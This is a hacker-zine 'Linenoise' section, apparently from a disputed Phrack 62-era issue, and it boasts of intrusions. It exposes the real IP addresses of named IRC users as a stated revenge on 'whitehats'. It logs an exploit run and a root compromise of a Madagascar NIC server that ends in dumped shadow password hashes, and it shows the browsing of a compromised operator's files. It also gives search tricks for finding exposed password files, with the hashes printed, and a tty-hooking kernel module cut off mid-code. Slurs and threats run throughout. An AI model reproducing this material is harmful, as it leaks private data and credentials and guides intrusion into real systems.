==Phrack Inc.== Volume 0x0b, Issue 0x3f, Phile #0x03 of 0x0f |=-------------------------=[ L I N E N O I Z E ]=------------------------=| |=------------------------------------------------------------------------=| |=----------------------------=[ phrackstaff ]=---------------------------=| Everything that does not fit somewhere else can be found here. Corrections and additions to previous articles, too short articles or articles that just dont make it, funny hacklogs....everything. |=[ 0x01 ]=---------------------------------------------------------------=| Finding the Whitehat - an0nym0us This brief user submission shows the lengths that some people will go to find the real IPs of known whitehats so that they can then be owned and rm'd. Enter the whitehat anti-witness protection program. Here's what happens to snitches on the net: root@mallory:/ezbake# ./burn `cat plaintext/netric-org.new2` /* cool awesome hacker header censored by pstaff */ Round 1 - Hamming distance: 22 - k0: 0x97c80e49 k1: 0x81c4058b k2: 0x79f481f2 Round 2 - Hamming distance: 18 - k0: 0xf0e28106 k1: 0x4861ad99 k2: 0x5f405d15 Round 3 - Hamming distance: 15 - k0: 0x0984e0b9 k1: 0xd1983d94 k2: 0x68042d31 Round 4 - Hamming distance: 14 - k0: 0x0984e0b5 k1: 0xd1983d90 k2: 0x68042d2d Round 5 - Hamming distance: 12 - k0: 0x4904e0b5 k1: 0xd1183d90 k2: 0x68042d2d Round 6 - Hamming distance: 11 - k0: 0x2984e0bd k1: 0xb1983d70 k2: 0x68042d15 Round 7 - Hamming distance: 9 - k0: 0x4884e0b0 k1: 0xd0983d9b k2: 0x68042ca9 Round 8 - Hamming distance: 8 - k0: 0x0804e0c0 k1: 0x90183d5b k2: 0x68042d39 Round 9 - Hamming distance: 7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39 Round 10 - Hamming distance: 7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39 Round 11 - Hamming distance: 6 - k0: 0x0804e0ce k1: 0x90183d45 k2: 0x68042d39 Round 12 - Hamming distance: 5 - k0: 0x4804f0cc k1: 0xd0183c87 k2: 0x68043d79 Round 13 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79 Round 14 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79 Round 15 - Hamming distance: 4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79 Round 16 - Hamming distance: 3 - k0: 0x4808f0ce k1: 0xd0103d85 k2: 0x68083c79 Round 17 - Hamming distance: 2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79 Round 18 - Hamming distance: 2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79 Round 19 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79 Round 20 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79 Round 21 - Hamming distance: 1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79 MATCH: 0x0000d0ce 0x00007d85 0x00005c79 >> w0a, str0ng keys, especially the most significant word ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | eSDee (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP) (unknown) ³ ircname : eSDee | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) | operator : eSDee (is NOT an IRC warrior) | help : eSDee - is available for help. | eSDee was (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP) root@mallory:/ezbake# ./burn -d 2EC0E90E.914AD78D.7FC28CE1.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 213.201.176.198 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | Laurens (~laurens@DD81E3B.D2642F0E.15F667A0.IP) (unknown) ³ ircname : laurens | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) | operator : Laurens (is NOT an IRC warrior) | help : Laurens - is available for help. root@mallory:/ezbake# ./burn -d DD81E3B.D2642F0E.15F667A0.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 81.17.46.157 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | Tex (~Tex@398AD8F4.5D1F7852.16B25093.IP) (unknown) ³ ircname : Tex - Representative of Shadows | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 1 hours 24 mins 57 secs (signon: Tue Sep 23 17:16:13 2003) root@mallory:/ezbake# ./burn -d 398AD8F4.5D1F7852.16B25093.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 213.214.43.116 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | Argv[] (~argv@2ECA21BE.36EC7F5.1BE1D223.IP) (unknown) ³ ircname : "Survival of the fittest." -- Darwin._ | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 23 hours 15 mins 25 secs (signon: Mon Sep 22 20:09:56 2003) root@mallory:/ezbake# ./burn -d 2ECA21BE.36EC7F5.1BE1D223.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 193.77.159.230 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | [Elwin]-gone (~Elwin@2E9E2501.725E068F.50F7261E.IP) (unknown) ³ ircname : http://Elwin.ChatValley.nl | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 23 hours 17 mins 53 secs (signon: Mon Sep 22 20:09:52 2003) root@mallory:/ezbake# ./burn -d 2E9E2501.725E068F.50F7261E.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 81.171.2.188 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | newroot (~seprioth@29A5FFF4.46779EFE.7026342B.IP) (unknown) ³ ircname : seprioth | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 1 hours 1 mins 21 secs (signon: Tue Sep 23 18:26:43 2003) root@mallory:/ezbake# ./burn -d 29A5FFF4.46779EFE.7026342B.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 212.6.91.195 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | h4x0r (~kiss@39C0CF3C.EC41C18A.37392DA9.IP) (unknown) ³ ircname : Level Seven Digital | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 23 hours 18 mins 43 secs (signon: Mon Sep 22 20:09:39 2003) [+] 219.101.83.40 ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | feeble (~null@25E7EE98.668A5C0B.75AA0ACB.IP) (unknown) ³ ircname : null | channels : @#netric ³ server : irc.netric.org (Netric IRC Server) : idle : 17 hours 0 mins 42 secs (signon: Mon Sep 22 20:09:59 2003) root@mallory:/ezbake# ./burn -d 25E7EE98.668A5C0B.75AA0ACB.IP -k 0x0000d0ce 0x00007d85 0x00005c79 [+] 209.26.65.169 |=[ 0x02 ]=---------------------------------------------------------------=| Ownage log of Network Information Center Madagascar - az14n xtr4v4g4nz4 * EDITOR'S NOTE * : This shit is pretty fuckin gay, and I'm not sure why we included it, apart from filling the void left by a lack of user submissions, but it should give you an insight into how people like s1/ dvdman hack. * * * * * * * * * openssl remote apache juarez!@# [+] SSL k0nn3kti0nz cipher: 0x405a454c ciphers: 0x81227b8 Session: 0000 - e6 35 88 5b d9 e8 23 15 fe 5d e7 6b 44 b7 d8 4d 0010 - 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0020 - 20 00 00 00 63 35 30 32 30 39 37 30 62 35 38 35 0030 - 32 38 64 33 31 61 30 31 33 32 33 62 34 36 63 36 0040 - 64 38 35 66 00 00 00 00 08 84 12 08 00 00 00 00 0050 - 00 00 00 00 01 00 00 00 2c 01 00 00 b3 87 d6 3f 0060 - 00 00 00 00 4c 45 5a 40 00 00 00 00 b8 27 12 08 0070 - check your addr and hit enter using 100 threads using retaddr 0xbffffd00 using retaddr 0xbffffc00 using retaddr 0xbffffb00 using retaddr 0xbffffa00 using retaddr 0xbffff900 using retaddr 0xbffff800 read: Connection reset by peer using retaddr 0xbffff700 using retaddr 0xbffff600 connected using addr 0xbffff54c bash: no job control in this shell bash-2.05$ bash-2.05$ uname -a; id; w; Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown uid=48(apache) gid=48(apache) groups=48(apache) bash: /usr/bin/w: Permission denied bash-2.05$ bash-2.05$ *** Few sekz l8r after d0wnl04d1ng s0m3 shietzniT *** bash-2.05$ ./aa sh-2.05# id uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin) *** Few sekz after ex3cut1ng s0m3 "too1z" *** The authenticity of host 'ns.nic.mg (62.173.234.149)' can't be established. RSA1 key fingerprint is dc:cd:da:72:fe:6e:db:70:ff:11:e5:cc:b4:27:80:80. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'ns.nic.mg,62.173.234.149' (RSA1) to the list of known hosts. root@ns.nic.mg's password: Last login: Tue Dec 9 11:30:41 2003 from 194.214.107.63 No mail. WARNING: Your password expires in 11 days [root@ns root]# uptime; id; uname -a 6:32am up 40 days, 18:46, 0 users, load average: 0.00, 0.00, 0.00 Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin) [root@ns root]# ls -a /var/named ./ 194.214.107.rev com.mg isoc.mg mg20031112 mil.mg net.mg org.mg save/ ../ asso.mg edu.mg mg mg.20031118 named.ca nic.mg prd.mg 127.0.0.rev co.mg gov.mg mg_20031028 mg.20031127 named.local nic.mg.db root.hints [root@ns root]# cat /etc/shadow root:$1$b1HQyHcU$3nSVn8nT/EwJoGZzo/k8G/:12347:0:60:7:30:-1:1235198 bin:*:11869:0:60:7::: daemon:*:11869:0:60:7::: adm:*:11869:0:60:7::: lp:*:11869:0:60:7::: sync:*:11869:0:60:7::: shutdown:*:11869:0:60:7::: halt:*:11869:0:60:7::: mail:*:11869:0:60:7::: news:*:11869:0:60:7::: uucp:*:11869:0:60:7::: operator:*:11869:0:60:7::: games:*:11869:0:60:7::: gopher:*:11869:0:60:7::: postgres:x:11869:0:60:7::: ftp:*:11869:0:60:7::: squid:x:11869:0:60:7::: gdm:x:11869:0:60:7::: htdig:*:11869:0:60:7::: dhcpd:*:11869:0:60:7::: named:*:11869:0:60:7::: postfix:*:11869:0:60:7::: snort:x:11869:0:60:7::: nscd:x:11869:0:60:7::: rpm:*:11869:0:60:7::: apache:*:11869:0:60:7::: rpcuser:*:11869:0:60:7::: rpc:*:11869:0:60:7::: sympa:*:11869:0:60:7::: gica:*:11869:0:60:7::: ldap:x:11869:0:60:7::: vpopmail:*:11869:0:60:7::: alias:*:11869:0:60:7::: qmaild:*:11869:0:60:7::: qmaill:*:11869:0:60:7::: qmailp:*:11869:0:60:7::: qmailq:*:11869:0:60:7::: qmailr:*:11869:0:60:7::: qmails:*:11869:0:60:7::: dnscache:*:11869:0:60:7::: dnslog:*:11869:0:60:7::: tinydns:*:11869:0:60:7::: axfrdns:*:11869:0:60:7::: nobody:*:11869:0:60:7::: xfs:!!:11869:0:60:7::: mysql:!!:11869:0:60:7::: ramboa:$1$JmsNoIyT$btZ6ua/K/yYJiLnVUQYLP1:12347:0:60:7:30:-1:3270910 sshd:!!:11870:0:60:7::: haja:$1$geO6qeHQ$Qr6LI21blDXgQgPTsBYll0:12061:0:60:7:30::1075898622 raft:$1$n7TZ4rYD$ES9PKofmF1BsKbqxJK/UG0:12167:0:60:7:30::3270910 [root@ns root]# [root@ns root]# [root@ns root]# exit Connection to ns.nic.mg closed. |=[ 0x03 ]=---------------------------------------------------------------=| IRC.NAC.NET Operator Gets Owned - anonymous aggressive irc dude * EDITORIAL INTERJECTION: While this log wasn't exactly what we would call a pinnacle of achievement in terms of hacklogs, we edited some of it out and left the slightly amusing/interesting parts * #do this to restart spammer "not only is he an oper but a spammer" cat q-read | grep local | sort | uniq -c | sort -nr > mail-to cat q-read | grep "<" | tr -s ' ' | cut -f8 -d' ' | sort | uniq -c | sort -rn > mail-from zvv261.com moneysaversx.com members.mdmedia2.com bmw1967.com gonetdeals.com yourbigfun.com wotch.com email.com dlbnetwork.net rbexpress.org optindeals offers- selectmediagroup.com good-karma-inc.com zvv261.com latinababes livenlearn13 kibitzers-return joke-of-the-day-return- ... qmaild 137 0.0 0.0 920 528 con- S 8:45AM 1:05.18 /usr/local/bin/t cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 207.99.0.69 smtp / usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd root 139 0.0 0.0 920 528 con- S 8:45AM 3:17.08 /usr/local/bin/t cpserver -v -R -H -c150 207.99.0.69 pop3 /var/qmail/bin/qmail-popup mercury.nac. net /var/qmail/bin/checkpoppasswd /var/qmail/bin/qmail-pop3d Maildir root 1422 0.0 0.0 932 568 ?? S 8:45AM 0:36.46 /usr/lib/courier -imap/libexec/couriertcpd -address=207.99.0.69 -stderrlogger=/usr/lib/courier-im ap/libexec/courierlogger -stderrloggername=imapd -maxprocs=100 -maxperip=4 -pid= /var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/lib/courier-imap/sbin/im aplogin /usr/lib/courier-imap/libexec/authlib/authdaemon /usr/lib/courier-imap/b in/imapd Maildir root 13596 0.0 0.0 932 576 ?? S 12:24PM 0:00.29 /usr/lib/courier -imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/libexec /courierlogger -stderrloggername=imapd-ssl -maxprocs=100 -maxperip=4 -pid=/var/r un/imapd-ssl.pid -nodnslookup -noidentlookup 993 /usr/lib/courier-imap/bin/couri ertls -server -tcpd /usr/lib/courier-imap/sbin/imaplogin /usr/lib/courier-imap/l ibexec/authlib/authdaemon /usr/lib/courier-imap/bin/imapd Maildir root 22240 0.0 0.0 2256 1372 ?? S 4:09PM 0:00.74 couriertls -loca lfd=4 -tcpd -server qmaild 9008 0.0 0.0 920 532 pb- S 6:34PM 0:03.13 /usr/local/bin/t cpserver -R -H -x/etc/auth.rules.cdb -c250 -u 1002 -g 1001 207.99.0.70 smtp /var /qmail/bin/qmail-smtpd-auth smtp-auth.nac.net /var/qmail/bin/checksmtppasswd /us r/bin/true root 57564 0.0 0.0 2256 1508 ?? S 10:13PM 0:00.41 couriertls -loca lfd=4 -tcpd -server root 37381 0.0 0.0 2256 1588 ?? S 10:59PM 0:00.14 couriertls -loca lfd=4 -tcpd -server root 1021 0.0 0.0 1104 792 p0 R+ 11:42PM 0:00.00 grep tcp (bash) qmaild 133 0.0 0.0 920 528 con- I 8:45AM 1:31.38 /usr/local/bin/t cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 64.21.52.92 smtp / usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd qmaild 135 0.0 0.0 920 528 con- S 8:45AM 4:24.47 /usr/local/bin/t cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 207.99.0.26 smtp / usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd ... Volume in drive C is MAIN Volume Serial Number is 94A4-D96A Directory of C:\ 07/21/2003 08:27 PM 382,006 2003-07-21-weather.bmp 06/26/2003 05:19 PM 44 800 fiasco.txt 05/21/2003 01:41 AM 9,569 agreement between joel tew and NAC may 20 2003.wpd 06/15/2003 10:37 PM 18,534 AlmostGone.jpg 08/22/2002 02:48 PM 0 AUTOEXEC.BAT 06/02/2003 01:38 AM bink 07/13/2003 09:19 AM Canon 06/08/2003 01:41 AM 61,440 CAPTURE.AVI 05/13/2003 08:18 AM cisco 08/22/2002 02:48 PM 0 CONFIG.SYS 05/13/2003 10:13 PM Crestron 08/23/2002 02:57 PM CX3D 08/26/2002 12:16 PM CxClient 05/13/2003 12:26 AM cygwin <--oh lord 07/26/2003 09:14 AM 140 deck stuffs.txt 05/17/2003 11:50 AM 23,617 dednow.txt 04/25/2003 09:26 PM DeLorme Docs 04/11/2003 11:00 PM digital pics 07/17/2003 09:54 PM 201 DMF2_WKLog.txt 04/22/2003 05:21 PM Documents and Settings 05/19/2003 02:27 AM 1,303 Download.qif 07/02/2003 08:51 AM 4,752 dp.txt 03/27/2003 09:11 PM dvv 05/19/2003 10:26 AM 83,456 ez.vsd 08/25/2002 04:40 PM games 06/11/2003 01:49 PM 18,003 GatorPatch.log 06/24/2003 09:00 PM gnugk 06/03/2003 09:40 PM 3,904 iix-peers.txt 06/01/2003 12:54 PM iso 07/23/2003 03:44 PM jeannine 04/27/2003 09:31 PM 12,974 jmr-ahr-atv-sunday.plt 07/24/2003 01:27 PM 3,276 mail.txt 04/19/2003 11:20 PM Mapping 06/06/2003 07:32 AM 2,528 mtr.txt 11/25/2002 09:15 PM My Documents 06/02/2003 12:25 AM My Downloads 04/28/2003 07:56 PM 30,720 NAC PHL01 MX Sheet.xls 07/17/2003 08:32 PM nomad2 04/19/2003 11:03 PM OziExplorer 07/17/2003 09:30 PM Program Files 07/23/2003 09:12 AM 79,846 pViewRes.pdf 03/07/2003 02:06 AM Sti 06/01/2003 07:45 PM 8,161 t.tpr 03/16/2003 11:56 AM TEMP 04/27/2003 09:45 PM 9,917 track99.txt 04/25/2003 05:19 PM 14,336 trx250x parts.xls 03/28/2003 12:23 AM vb-proj 06/08/2003 11:49 PM winaprs 07/17/2003 09:30 PM WINDOWS 04/08/2003 08:59 PM 1,716,685 zoc411_win_english.exe 24 File(s) 2,485,412 bytes <--owned 26 Dir(s) 51,500,957,696 bytes free ... _____________________________________________ | latency (alex@host-72-on-the-lake.ahr.nac.net) | name : Alex | chan : @#nanog @#gaysex @#ownd | serv : irc.nac.net |=[ 0x04 ]=---------------------------------------------------------------=| REAL Google Hacks - n1elz pr0v0s Disclaimer ---------- Iph j00 g3t buzted c0s oph diz den j00 r a lahmer. Hey y0. Maybe like me you got kinda excited by that new book that came out "Google Hacks". Wow, I thought. Is this finally a book documenting all those neat little holes in the google CGI interface for all to see?!? But, no. This is 325 mind-numbing pages on how to use a search engine. Geez, I mean it's not like divineint hasn't been trading googlesrc.tgz since summer 2002 (parser.c, line 264 is always fun if you like a laugh). Anyway, before I took the book back and exchanged it for 2million copies of route's latest Hacker's Challenge book I thought I'd flick thought it and surprisingly it actually gave me a few ideas about how this crap could be used to actually hack. So yea here's all the infoz I could be bothered to dig up, phresh for you phrackerz. (I tried to sell the concept to O'reilly but they wouldn't give). --- http://www.google.com/search?q=daemon:NP:6445:&hl=en&lr=&ie=UTF-8&start=10&sa=N Web Images Groups Directory News Searched the web for daemon:NP:6445:. Results 11-20 of about 109. Search took 0.11 seconds. 
<html> <head> </ ...
... &lt;html&gt; &lt;head&gt; &lt;/head&gt;&lt;body&gt;&lt;pre&gt;root:SSpbaftOt8rE6:8573:::::
daemon:NP:6445::::: bin:NP ...
www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow - 1k - Cached - Similar pages



---

Wow, looks like we hit paydirt right here. Hey wait.. I bet it's a dead
link or something, lets make sure it works...

---

http://www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow

root:SSpbaftOt8rE6:8573::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
smtp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
pop:NP:6445::::::
discuss:NP:6445::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::

---

h0h0h0. Lookz like somone forget to configure their afs server properly!
Letz explore a little deeper.

---

http://www.mit.edu/afs/athena/system/config/passwd/

 Parent Directory        08-Jul-2001 01:18      -  
 rhlinux/                07-Feb-2000 22:38      -  
 sgi_53/                 26-May-1998 20:40      -  
 sgi_62/                 26-May-1998 20:40      -  
 sgi_63/                 26-May-1998 20:40      -  
 sgi_65/                 22-Apr-1999 01:06      -  
 sun4m_54/               26-May-1998 20:40      -  
 sun4x_55/               26-May-1998 20:40      -  
 sun4x_56/               26-May-1998 20:40      -  
 sun4x_57/               26-May-1998 20:40      -  
 sun4x_58/               26-May-1998 20:40      -  
 sun4x_59/               26-May-1998 20:40      -  

---
OMG w00t. Lookz like we now have lotza passwords!@
Letz make sure we can acesss them all.
---

http://www.mit.edu/afs/athena/system/config/passwd/sgi_53/passwd

root:SSpbaftOt8rE6:0:0:Super-User:/:/bin/athena/tcsh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp:*:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
nuucp:*:10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
EZsetup:*:992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh
demos:*:993:997:Demonstration User:/usr/demos:/bin/csh
OutOfBox:*:995:997:Out of Box Experience:/usr/people/tour:/bin/csh
guest:*:998:998:Guest Account:/usr/people/guest:/bin/csh
4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
pop:*:50:101:Post Office Protocol,,,,:/var/spool/pop:/dev/null
discuss:*:32000:101:Discuss System,,,,:/var/spool/discuss:/dev/null

---

Yep! It looks like we can!
Letz see what else is on there!

---

http://www.mit.edu/afs/net.mit.edu/system/vax_bsd43/srvd.72/etc/passwd

root:2pEdLRdD8rMnk:0:1:System PRIVILEGED Account:/:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:

---

Jesus, a VAX! It lookz like we've discovered a true digital Jurrasic Parq
here guyz!@ Ok now we'll try to google for "root:*:0:0:Charlie", this
will find mainly bsd systems.

---

http://www.ensta.fr/~perret/Cours/Securite/Ensta/passwd

Jesus, I'm not even going to paste this because it's juzt not all gonna fit!@

--


That french one has mad passwords for your hacking adventures but the MIT
ones are all root pw'z only. I'd bet pretty highly tho that the main NIS
server (or LDAP or whatever they use) is as fucked up as those so you can
prolly http:// your way to however many hundred thousand passwords. Even
if you can't be bothered doing that then I'm sure there's plenty of kidz
out there who have these 3Ghz boxes for playing quake or smt. Use your 
magination. If you get realjiggy with search stringz then it's possible
to turn out shadow files for all kinda of .gov's (nist, lbl etc) and stuff
so yea, play around.




|=[ 0x05 ]=---------------------------------------------------------------=|

p62 Poll
- http://www.securitybriefing.com/modules.php?name=Surveys&pollID=2

                                     Survey
                                [pixel.gif]

   What is your opinion of "Phrack 62"?
   ( ) Loads of FUD from worthless Black Hats.
   ( ) Good articles but silly/immature commentary.
   (*) The best thing I ever read.




|=[ 0x06 ]=---------------------------------------------------------------=|

p62 Release Announcements Heralded Worldwide


- http://www.informit.com/isapi/weblog_id~%7BCEF1DC33-01E0-45D5-8FCA-348DC993AA75%7D/st~%7B4D022936-8769-4F76-9152-F65D036DEDF9%7D/weblog/showComments.asp

"Fake" Phrack 62 is out
by Seth Fogie - SEP 22, 2003 11:22:24 PM

                                                                0 Replies

Whitehat,  Blackhat, greyhat, or even anti-hat, this edition of Phrack
has  it  all.  If  you  have  never  heard  of Phrack, it is an online
publication that has long held the interests of hackers from all types
of  backgrounds.  Phone  systems,  electronics, traffic lights, and of
course  the typical computer have all been targeted by Phrack authors.
However,  in the last week Phrack 62, also being referred to as a fake
Phrack,  made  its  debut.  While  this  version  definitely  had some
interesting  technical  chapters,  it  provided  several not to subtle
discussions against the whitehat hackers of the world.

Regardless,  if  you  are  looking  for  something  that  is humorous,
technically  interesting,  and  maybe  even  a  little offensive, this
version of Phrack is for you! Just dont believe everything you read

----------------------------------------------------------------------

Found cached on www.professionalsecuritytester.net/

Phracks has been released
Posted by cdupuis on Sunday, September 21 @ 09:01:06 EDT (2 reads)


PHRACK #62 Has Been Released


Phrack Magazine is one of the longest running electronic magazines in
existence, and certainly one of the most interesting.  Since 1985,
Phrack has been providing the hacker community with information on
operating systems, networking technologies and telephony, as well as
relaying features of interest to the international computer underground.
The Phrack Magazine team released a new issue of this Magazine, number 62.

1) Introduction - Phrack Staff
2) Loopback - Phrack Staff
3) Linenoise - Phrack Staff
4) Toolz Armory - elguapo
5) Phrack Prophile on shok - Phrack Staff
6) Eye on the Spy - tr4shc4n m4n
7) Local Honeypot Identification - Joseph Corey
8) Look, a Phone Article!! - d0nn1e n4rk0
9) Writing Plan9 Shellcode - m1lt0n
10) Crucial LKMS for All Hackers - warez mullah
11) New Hacking Manifesto - cr4zy c0nsuel0
12) THE PROJEKT MAYHEM TOOLKIT - d0kt0r m4ngl3r
13) Sneeze: Wreaking Havoc Upon Snort - m1lt0n
15) Phrack World News - Phrack Staff


Additional Information:
The information has been provided by Phrack Staff.




|=[ 0x07 ]=---------------------------------------------------------------=|

THE LEET SPEAK LKM
- KaRELeSS KaRL & warez mullah


y0y0y0, f0r 4ll 0f eWe h4cK3rz 0ut there in h4krsp4ce h3r3 iZ a mod 2 make
the operating system formerly backdoored by suCKit m0re us4ble for 4ll of
eWe el8 h4qrz.

r u s1q of using stran9er/swr's tcl kodez to speak like a ku0ldu0d on irc?
then this lkm is the anzw3r 2 y0ur pray3rz......


Begin Extraction of el8 k0d3z h3r3 ---------------------------------------

#define MODULE
#define __KERNEL__

/* By using this code you subject yourself to submitting to our will. You
   forfeit any and all rights once you have compiled this code. Whitehats
   please take note that we reserve the right to rm your fat ass if we learn
   of its usage. Snosoft and iDefense you still have reserve the right to
   be owned like jobe. Any modifications to this el8 code will result in a
   prompt rm'ing and death by webcam so we can watch for our own amusement
   because we fat goths are simply too big to leave our beds. eEye is the
   root of all microsoft's problems. They are the virii writers that crash
   your XP machine just as Jenna Jameson catches that load in her eye.
   Atstake employees take note, we are watching you. Your continued acts of
   script kiddy'ism will not be tolerated by us or your managers. Further
   acts will result in PHC release of logs for Atstake Management review.
   Now get back to cracking those NT Lan Man passwords and SQL injection
   codes.

   Oh, and have a Merry Fucking Christmas!
*/
/* To Compile: cc -c -o whatthefuckever.o -I/lib/modules/`uname -r`/include thisfile.c */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define ONE 1
#define NOTONE 0
#define NOTNOTONE 1
#define THEOISGAY 1
#define BEGIN_KMEM { mm_segment_t o = getfs(); setfs(get_ds());
#define END_KMEM   setfs(o); }
#define LANCE_SPITZNERS_HOME_IP " "
#define BAD_INT int
#define GOOD_INT unsigned int
#define CHAR char
#define SECURE_CHAR unsigned char
#define STRUCT struct
#define HOWBIGISIT size_t
#define system memset
#define sys_unlink kmalloc
#define printf kfree
#define fprintf copy_from_user
#define syslog copy_to_user
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
#ifdef MODULE_LICENSE
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Phrack Labs");
#endif
#endif


char *targetproclist[] =
{ "epic", "BitchX", NULL };

ssize_t er33t_tty_read(struct file      * file,
                        CHAR            * buf,
                        HOWBIGISIT              count,
                        loff_t          *ppos);
ssize_t (*o_read)       (struct file    * file,
                        CHAR            * buf,
                        HOWBIGISIT              count,
                        loff_t          *ppos);



void play_with_ttys( void );
void stop_molesting_ttys( void );

BAD_INT init_module(void)
{
    play_with_ttys();
    return NOTONE;
}

void
cleanup_module(void)
{
   stop_molesting_ttys();
   return;
}


BAD_INT last_was_leet = 1;


void play_with_ttys( void )
{ (void *) o_read = (void *) current->files->fd[0]->f_op->read;
  current->files->fd[0]->f_op->read = (void *) er33t_tty_read;
};

void stop_molesting_ttys( void )
{ (void *) current->files->fd[0]->f_op->read = (void *) o_read; }


ssize_t er33t_tty_read(struct file      * file,
                        CHAR            * buf,
                        HOWBIGISIT      count,
                        loff_t          *ppos) {
        BAD_INT l;
        GOOD_INT pos;
        CHAR *er33tbuf;
        int i;

        system(buf,0,count);
        l = (*o_read)(file,buf,count,ppos);
        if (l < 0) return THEOISGAY;

        /* added @ the last minute */
        i=0;
        while(targetproclist[i]!=NULL)  {
                if (strstr (current->comm, targetproclist[i]))
                        goto THEO_IS_A_GLORYHOLE_GIRL;
        }

        return l;
THEO_IS_A_GLORYHOLE_GIRL:
        er33tbuf = sys_unlink(sizeof(CHAR) * (l+1),GFP_KERNEL);
        system(er33tbuf,0,l+1);
        if(fprintf(er33tbuf,buf,l)) {
                printf(er33tbuf);
